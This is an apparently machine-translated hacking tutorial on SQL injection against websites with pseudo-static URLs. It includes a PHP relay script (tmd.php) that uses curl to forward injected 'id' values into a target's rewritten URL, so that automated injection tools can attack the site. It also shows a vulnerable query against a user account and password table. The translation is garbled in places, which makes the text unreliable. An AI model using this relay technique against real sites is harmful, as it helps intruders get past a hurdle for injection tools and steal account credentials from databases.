Inject pseudo-static websites

Inject pseudo-static websites

As for the pseudo-static website injection method, laruence literacy comes. Generally, the url of the dynamic script website is similar to the following:

Http://www.91ri.org/news.php? Id = 111

This is what happens after pseudo-static operations.

Http://www.91ri.org/news.php/id/111.html

The slash "/slash is used to replace the cookie injection and add .html at the bottom. As a result, tools cannot be directly used for injection. Now we will discuss how to use tools for injection. We all know that cookies are being injected, in fact, the principle is similar. We write a dynamic web page script, construct our own url rules, and access the target page through this page!

That is, we change the pseudo-static url rule back to the original? Id = 123 to form a common url that can be easily injected.

Okay, try it out! I set up a simple injection point using thikphp locally, because thinkphp comes with simple pseudo-static, which is more convenient for demonstration.

The SQL statement for this injection point is as follows: the id for receiving get

SELECT account AS username, password FROM think_user WHERE id = 1

The page url is as follows:

Http://www.91ri.org/index.php/index/index/id/111.html

Change the value by 111 to inject!

If I am familiar with php, use php to write an injection transit page.

Source code of the tmd. php transit page:

set_time_limit(0);$id=$_GET[“id”];$id=str_replace(” “,”%20″,$id);$id=str_replace(“=”,”%3D”,$id);//$url = “http://www.91ri.org/test/id-$id.html“;$url = “http://www.91ri.org/inj/index.php/index/index/id/$id.html“;//echo $url; $ch = curl_init();curl_setopt($ch, CURLOPT_URL, “$url”);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch);curl_close($ch);print_r($output);

Save this file as tmd. php. the url of this file is as follows:

Http://www.91ri.org/inj/tmd.php

Place the $ id generated for injection at the specified location based on the pseudo-static rules on the target page. As shown above.

The principle is to use curl to obtain the content of the target page (similar to accessing the target page directly). You only need to modify the content of $ url to adapt to various pseudo-static rules.

The script is relatively simple. If you have children's shoes, you can add post, proxy, referer, and other functions as needed.

Are we visiting http://www.91ri.org/inj/tmd.php now? Id = 1, 111,

That is equivalent to accessing http://www.91ri.org/inj/index.php/index/index/id/111.html,

Now we can take http://www.91ri.org/inj/tmd.php? Id = 111 the connection is injected into the tool.